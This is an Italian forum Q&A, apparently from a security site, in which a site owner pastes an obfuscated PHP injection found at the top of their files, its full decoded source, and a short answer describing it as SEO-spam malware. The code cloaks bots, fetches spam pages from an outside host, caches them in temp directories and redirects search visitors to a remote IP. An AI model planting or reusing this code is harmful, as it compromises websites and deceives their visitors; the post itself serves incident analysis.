Codice PHP male Ho bisogno di aiuto per l'analisi

2

Ho trovato sul mio server qualcosa di simile all'inizio dei miei file php:

<?php eval(gzinflate(base64_decode('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')));?>

Dopo la decodifica ho ricevuto:

if (!defined('frmDs')){
    define('frmDs' ,1);
    error_reporting(0);

    function frm_dl ($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $out = curl_exec ($ch);
            if (curl_errno($ch) !== 0) $out = false;
            curl_close ($ch);
        } else {$out = @file_get_contents($url);}
        return trim($out);
    }

    function frm_crpt($in){
        $il=strlen($in);$o='';
        for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
        return $o;
    }

    function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
        $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
        $fe = file_exists($f);
        if(!$fe || time() - filemtime($f) > 60 * $cmtime)
        {
            $dlc=frm_dl($link);
            if($fe && $dlc===false) 
                @touch($f);
            else
            {
                if($fe && empty($dlc) && $toe) 
                {
                    @touch($f);
                }
                else
                {
                    if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
                    else{return $dlc;}
                }
            }
        }
        $fc = @file_get_contents($f);
        return ($fc)?frm_crpt($fc):'';
    }

    function frm_isbot(){
        $ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
        if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
        $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
                    array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
                    array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
        foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
        if(!$ua)return true;
        $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
        foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
        $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
        $hba=array('google','msn','yahoo');
        if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
        return false;
    }

    function frm_tmpdir(){
        $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';

        foreach ($fs as $f){
            $tf = $f.'/'.md5(rand());
            if($fp = @fopen($tf, 'w')){
                fclose($fp);
                unlink($tf);
                return $f;
            }
        }
        return false;
    }

    function frm_seref(){
        $r = @strtolower($_SERVER["HTTP_REFERER"]);
        $ses = array('google','bing','yahoo','ask','aol');
        foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
        return false;
    }

    function frm_havekey($s=false){
        $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
        $k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
        if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
        foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
        return '';
    }

    function frm_strtonum($Str, $Check, $Magic) {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++) {
            $Check *= $Magic;
            if ($Check >= $Int32Unit) {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str{$i});
        }
        return $Check;
    }

    function frm_chhash($String) {
        $Check1 =frm_strtonum($String, 0x1505, 0x21);
        $Check2 = frm_strtonum($String, 0, 0x1003F);
        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
        $Hashnum = ($T1 | $T2);
        $CheckByte = 0;
        $Flag = 0;
        $HashStr = sprintf('%u', $Hashnum) ;
        $length = strlen($HashStr);
        for ($i = $length - 1;  $i >= 0;  $i --) {
            $Re = $HashStr{$i};
            if (1 === ($Flag % 2)) {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag ++;
        }
        $CheckByte %= 10;
        if (0 !== $CheckByte) {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2) ) {
                if (1 === ($CheckByte % 2)) {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }
        return '7'.$CheckByte.$HashStr;
    }

    function frm_chpr($url,$td){
        $ch=frm_chhash($url);
        $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
        if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
    }

    function frm_red($k){
        if(!frm_isbot() && frm_seref()){
            $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
            $s=@urlencode($_SERVER['HTTP_REFERER']);
            die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
        }
    }

    $tdir = frm_tmpdir();
    $isb=frm_isbot();
    $k=frm_havekey();
    $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
    if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
    if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
        $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
        $sp = "http://yoxvjkygff.rr.nu/stat/feed.php?pa=$parg&h=$host";
        //
        $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        if($isb && ($ppr = frm_chpr($tp)) > 1){
            $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
            if($pc) die($pc);
        }
        //
        $ruri = strtolower($_SERVER['REQUEST_URI']);
        $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
        if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
            frm_red($k);
            die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
        }   
        if (($ruri=='/' || $ruri=='/index.php') && $isb) {
            $c=frm_getcache($tdir, $sp ,60*24);
            if($c)die($c);
        }
        //
        if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
            if(strpos($sdl, '|'.$ruri.'|') !== false){
                frm_red($k);
                die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
            }
        }
    }
    if($k) frm_red($k);
}

Puoi aiutarmi e dirmi quali informazioni utili posso ottenere da questo?

    
posta JayKey 26.11.2014 - 15:27
fonte

1 risposta

3

In realtà ho visto questa piccola porzione di codice (o qualcosa di molto simile) che infettava un sistema prima. Ad un alto livello questo codice cerca di guardare il traffico che soddisfa determinati criteri (statistiche Bot, fonte, parole chiave in richiesta, ecc.) E scarica ciò che può essere descritto solo come qualcosa tra un elenco di parole chiave SEO black hat e un annuncio sul parte superiore della pagina. Utilizza anche un sistema di memorizzazione nella cache dove tenta di memorizzare i modelli renderizzati con il prefisso "sess_". Se trovi una directory in cui sono presenti i permessi di scrittura, dovresti vedere alcuni di questi riempimenti che saranno interessanti da recensire.

Mentre deve essere pulito e il vettore di attacco rattoppato, non è il bit di codice più dannoso che lo sia ora. Il problema è che, una volta installato, nulla lo ferma per l'esecuzione di altri tipi di codice che potrebbero causare più problemi.

    
risposta data 26.11.2014 - 15:45
fonte

Leggi altre domande sui tag